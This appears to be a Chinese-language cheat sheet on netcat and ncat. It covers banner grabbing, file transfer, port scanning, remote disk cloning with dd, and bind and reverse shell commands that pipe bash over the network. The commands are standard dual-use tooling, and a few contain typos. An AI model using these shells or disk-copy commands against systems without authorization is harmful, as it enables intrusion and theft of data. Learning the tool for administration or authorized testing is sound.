一个假猪套神器:NET CAT-NC
引:NAT CAT有”瑞士军刀“的美称,支持跨平台的使用。
- 小身材,大智慧
- 侦听模式/传输模式
- telnet/获取banner信息
- 传输文本信息
- 传输文件/目录
- 加密传输文件
- 远程控制/木马
- 加密所有流量
- 流媒体服务器
- 远程克隆硬盘
NC TELNET /BANNER :
- nc -nv 1.1.1.1 80
- nc -nv 1.1.1.1 25
- nc -nv 1.1.1.1 110
NC 传输文件/目录:
传输文件
- A:nc -lp 333>1.mp4
- B:nc -nv IP 端口<1.mp4 -q 1(传递连接完毕后1秒断开)
- 或
- A:nc -q l -lp 333 <a.mp4
- B:nc -nv 1.1.1.1 333>2.mp4
传输目录
- A:tar -cvf -music/ | nc -lp 333 -q 1
- B:nc -nv IP 端口 | tar -xvf -
加密传文件
- A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256-m ecb >1.mp4
- B: mcrypt --flush -Fbq -a rijindael-256 -m ecb <a.mp4 | nc -nv IP 端口 -q 1
NC-流媒体服务
- A:cat 1.mp4 | nc -lp 333
- B: IP 端口 | mplayer -vo x11 -cache 3000 -
NC 端口扫描
- nc -nvz ip 端口范围(TCP协议)
- nc -nvzu ip 端口范围(UDP协议)
NC 远程克隆硬盘
- A: nc lp 333 | dd of= /dev/sda
- B: dd if=/dev/sda | nc -nv IP 端口 -q 1
- 远程电子取证,可以将目标服务器硬盘远程复制,或者内存。
NC 远程控制
PS:建立连接后可以实现双向的控制(服务器端与控制端)。
正向连接:
- A:nc -lp 333 -c bash
- B:nc ip 端口
反向连接:
- A: nc -lp 333
- B:nc ip 端口 -c(连接建立后生成一个shell) bash
NC:NCAT
- NC缺乏加密与验证能力
- NCat包含于Nmap工具中
- A: ncat ncat -c bash -allow IP -vnl 端口 --ssl
- B:ncat -nv IP 端口 -ssl
- 不同系统/平台的NC参数功能不一定全部相同